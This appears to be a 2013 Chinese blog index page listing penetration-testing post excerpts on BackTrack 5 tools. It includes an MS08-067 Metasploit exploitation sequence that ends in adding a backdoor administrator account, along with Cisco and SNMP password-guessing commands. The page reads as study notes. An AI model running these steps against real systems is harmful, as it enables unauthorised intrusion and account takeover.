渗透攻防 - 随笔分类(第2页) - 寻步

如何成为一名黑客

摘要：从小到大听说了无数关于“电脑黑客”的故事，比如XXX入侵美国五角大楼，再比如前几年的“熊猫烧香”病毒，这些故事的主角都被我们的媒体称之为 “黑客”。其实这些人，更大程度上应该被称之为“cracker（骇客）”，而不是 “hacker（黑客）”，很多媒体和作家实在是侮辱了hacker 。cracker 阅读全文

posted @ 2013-11-30 23:52 寻步阅读(643) 评论(0) 推荐(0)

msf常用命令

摘要：msf > search -r great -t exploits search命令查找rank为great的exploitmsf > setg RHOST 192.168.1.102 一个值赋给全局变量，这样在使用其他模块时，RHOST也同时被设定。uset usetg 解除变量msf >info exploit/windows/smb/ms08_067_netapi 查看漏洞利用详细信息阅读全文

posted @ 2013-11-29 23:27 寻步阅读(396) 评论(0) 推荐(0)

解决BT5不能使用putty连接问题

摘要：root@bt:~# cd /etc/sshroot@bt:/etc/ssh# sshd-generate Generating public/private rsa1 key pair.Your identification has been saved in /etc/ssh/ssh_host_key.Your public key has been saved in /etc/ssh/ssh_host_key.pub.The key fingerprint is:fb:10:bb:82:1d:4e:5d:63:50:49:01:f5:70:f1:ad:80 root@btThe key& 阅读全文

posted @ 2013-11-29 23:13 寻步阅读(256) 评论(0) 推荐(0)

netcat

摘要：root@bt:~# nc -v -n -z 192.168.1.102 1-1024 端口扫描阅读全文

posted @ 2013-11-29 00:44 寻步阅读(191) 评论(0) 推荐(0)

漏洞发现

摘要：cisco工具：root@bt:/pentest/cisco/cisco-auditing-tool# ./CAT -h 192.168.1.102 -w lists/community -a lists/passwords -iroot@bt:/pentest/cisco/ciscos# ./ciscos 192.168.1.0 3 -t 4 -C 10 cisco password scanner 用于扫描网段中cisco默认的密码，速度很快。snmp工具：root@bt:/pentest/enumeration/snmp/admsnmp# ./ADMsnmp 192.168.1.102. 阅读全文

posted @ 2013-11-27 21:23 寻步阅读(369) 评论(0) 推荐(0)

vpn探测

摘要：root@bt:~# ike-scan -M -v 192.168.1.102root@bt:~# sslscan 192.168.1.102 阅读全文

posted @ 2013-11-27 20:46 寻步阅读(79) 评论(0) 推荐(0)

服务探测

摘要：root@bt:~# amap -bq 192.168.1.102 80 探测目标主机目标端口的具体服务root@bt:/pentest/scanners/httsquash# ./httsquash -r 192.168.1.102 查看目标主机信息httprint 阅读全文

posted @ 2013-11-27 02:33 寻步阅读(300) 评论(0) 推荐(0)

BackTrack 5 R3 Metasploit更新方法及msfupdae,msconsole出错解决办法

摘要：更新Metasploit最新版本:#cd /opt/metasploit/ #rm -rf msf3 #git clone --depth=1 git://github.com/rapid7/metasploit-framework msf3 执行msfupdate出错如下: Gem::Installer::ExtensionBuildError:ERROR:Failedtobuildgemnativeextension. /opt/metasploit/ruby/bin/rubyextconf.rb checkingforpg_config...yes Usingconfigvaluesfr 阅读全文

posted @ 2013-11-27 01:15 寻步阅读(1290) 评论(0) 推荐(0)

操作系统指纹

摘要：root@bt:/pentest/enumeration/irpas# p0f 被动地接受包，可以探测连接自己的主机的操作系统版本。cisco的ips的操作系统学习用的就是这个。root@bt:~# xprobe2 192.168.1.102 主动探测目标系统阅读全文

posted @ 2013-11-27 01:13 寻步阅读(284) 评论(0) 推荐(0)

扫描工具

摘要：genlist -s 192.168.1.\* 只显示目标网络的活动主机hping3 -c 2 192.168.1.102 hping3工具可以自定义包发送，格式比较复杂。我们这里是最简单的应用。nbtscan 192.168.1.1-254 只能扫描出活动着的微软主机，速度很快。nping -c 1 --tcp -p 80 --flags syn 192.168.1.102 支持比较好的自定义包root@bt:/pentest/enumeration/snmp/onesixtyone# ./onesixtyone -c dict.txt 192.168.1.102 snmp服务密码... 阅读全文

posted @ 2013-11-26 23:11 寻步阅读(400) 评论(0) 推荐(0)

ms08_067利用过程

摘要：进入msf。show exploits。use exploit/windows/smb/ms08_067_netapi。show playloads。set PLAYLOAD windows/shell/bind_tcpset RHOST ip地址等选项。set target 41。exploit。得到cmd命令行：添加用户、提权：net user newuser 123456 /addnet localgroup administrators newuser /add 阅读全文

posted @ 2013-11-25 21:45 寻步阅读(339) 评论(0) 推荐(0)

vmware中网络连接方式介绍

摘要：阅读全文

posted @ 2013-11-25 20:55 寻步阅读(123) 评论(0) 推荐(0)

SQL注入攻击

摘要：SQL注入攻击：http://www.cnblogs.com/tanshuicai/archive/2010/02/03/1664900.htmlSQL注入攻防详解：http://www.cnblogs.com/heyuquan/archive/2012/10/31/2748577.html 阅读全文

posted @ 2013-08-20 00:36 寻步阅读(229) 评论(0) 推荐(0)

SMB/CIFS协议解析

摘要：1、SMB协议与CIFS协议的区别 139端口是一种TCP端口，该端口在通过网上邻居访问局域网中的共享文件或共享打印机时就能发挥作用。445端口也是一种TCP端口，该端口在 Windows 2000 Server或Windows Server 2003系统中发挥的作用与139端口是完全相同的。具体地说，它也是提供局域网中文件或打印机共享服务。不过该端口是基于CIFS协议（通用因特网文件系统协议）工作的，而139端口是基于SMB协议（Server Message Block服务器协议族）对外提供共享服务。NBT(NetBIOS over TCP/IP)使用137, 138 (UDP) and 1 阅读全文

posted @ 2013-08-02 16:25 寻步阅读(7177) 评论(0) 推荐(0)

2012年目标攻击和APT高级持续性攻击

摘要：经过整个2012年，我们研究了各式各样的目标攻击，包括好几个APT高级持续性渗透攻击活动（例如LuckyCat和Ixeshe），也更新了一些已经运行一段时间的攻击活动（例如Lurid/Enfal和Taidoor）。信息安全群体在今年有很多关于目标攻击的精采研究发表，我将这些有意思的研究集结起来，分成六个我认为可以代表2012年目标攻击趋势的主题：目标和工具虽然在 2011 年，目标攻击几乎就等同于APT。在 2012 年出现了各式各样的攻击，特别是在中东地区，包括沙特阿拉伯的 Shamoon，Mahdi 攻击活动，GAUSS 和 Wiper/Flame，这些都被卡巴斯基所记录起来。还有一些攻阅读全文

posted @ 2013-05-03 20:22 寻步阅读(236) 评论(0) 推荐(0)

随笔分类 - 渗透攻防